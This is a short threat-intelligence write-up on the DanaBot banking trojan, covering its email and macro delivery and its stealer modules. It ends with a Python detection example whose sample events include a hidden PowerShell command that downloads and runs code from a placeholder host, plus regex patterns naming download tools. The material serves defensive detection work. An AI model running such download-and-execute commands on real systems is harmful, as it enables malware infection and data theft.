DanaBot is a banking trojan discovered by Proofpoint researchers targeting users in Australia through malicious emails. Still considered under development, the banking trojan was first seen in emails with subject lines such as “Your E-Toll account statement”, which contained URLs directing victims to a Microsoft Word document with macros, hosted on another site. If the macros are enabled, a PowerShell command runs that downloads DanaBot. A second wave of DanaBot attacks used URLs that redirected users to a zipped JavaScript file; when executed, it would download the trojan onto the machine if the server detected that the victim's IP address was in Australia.

The malicious payload downloads three DLL files containing a stealer and a sniffer, along with a configuration file that holds a list of targeted sites for the sniffer module, banking web injects, and a list of cryptocurrency processes and files to monitor. Once DanaBot is present on the victim's system, it uploads files to the C2 server that include detailed system information, screenshots of the user's desktop, and a list of files on the user's hard disk.
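The two delivery chains described above (Word macro spawning a PowerShell downloader, and a JavaScript file run from an opened zip) leave a recognisable parent/child process pattern. The following is an added detection example written for this page, not code from Proofpoint or from the original write-up; the process-creation events and rule names are constructed for illustration.

```python
import re

# Constructed sample process-creation events (parent image, image, command line),
# the fields a Sysmon/EDR process-creation record would carry. Not real telemetry.
SAMPLE_EVENTS = [
    ("C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\wscript.exe",
     'wscript.exe "C:\\Users\\alice\\AppData\\Local\\Temp\\Temp1_statement.zip\\statement.js"'),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\notepad.exe",
     "notepad.exe C:\\Users\\alice\\notes.txt"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Common download primitives seen in macro-launched PowerShell one-liners.
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitstransfer|\bcurl\b|\bwget\b", re.I)
# Explorer extracts a zip opened from the browser into %TEMP%\Temp1_<name>\ before running it.
ZIP_TEMP_JS = re.compile(r"temp\\temp1_[^\\]*\\[^\"']+\.js", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(parent, image, cmdline):
    """Return the list of rule names this event matches (empty if nothing matched)."""
    hits = []
    if (basename(parent) in OFFICE_APPS and basename(image) == "powershell.exe"
            and DOWNLOAD_MARKERS.search(cmdline)):
        hits.append("office_spawns_powershell_downloader")
    if basename(image) in SCRIPT_HOSTS and ZIP_TEMP_JS.search(cmdline):
        hits.append("script_host_runs_js_from_zip_temp")
    return hits


def scan(events):
    """Index and rule hits for every event that matched at least one rule."""
    return [(i, classify_event(*e)) for i, e in enumerate(events) if classify_event(*e)]
```

Both rules are parent/child and command-line heuristics, so they flag the delivery stage rather than DanaBot itself; pair them with the later DLL drops and C2 uploads for confirmation.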

Technical Details:

  • Proofpoint provides a technical analysis of DanaBot here.

Image Source: Proofpoint